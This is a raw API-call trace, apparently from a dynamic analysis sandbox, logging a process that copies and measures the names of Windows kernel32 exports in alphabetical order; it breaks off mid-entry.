lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.936] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.936] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.936] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.936] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.936] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.936] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.936] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.936] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.936] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.936] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.936] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.936] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.936] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.936] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.937] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.937] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.937] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.937] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.937] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.937] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.937] lstrlenA (lpString="COPYFILEA") returned 9 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.937] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.937] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.937] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.937] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.937] lstrlenA (lpString="COPYFILEW") returned 9 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.937] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.937] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.937] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.937] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.937] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.937] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.937] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.937] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.938] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.938] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.938] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.938] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.938] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.938] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.938] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.938] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.938] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.938] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.938] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.938] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.938] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.938] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.938] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.938] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.938] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.938] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.938] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.939] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.939] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.939] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.939] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.939] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.939] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.939] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.939] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.939] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.939] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.939] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.939] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.939] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.939] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.939] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.939] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.939] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.939] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.939] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.939] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.940] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.940] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.940] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.940] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.940] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.940] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.940] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.940] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.940] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.940] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.940] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.940] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.940] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.940] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.940] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.940] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.940] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.940] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.940] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.941] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.941] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.941] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.941] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.941] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.941] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.941] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.941] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.941] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.941] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.941] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.941] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.941] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.941] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.941] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.941] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.941] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.941] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.942] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.942] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.942] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.942] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.942] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.942] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.942] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.942] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.942] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.942] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.942] lstrlenA (lpString="DELETEATOM") returned 10 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.942] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.942] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.942] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.942] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.942] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.942] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.942] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.942] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.943] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.943] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.943] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.943] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.943] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.943] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.943] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.943] 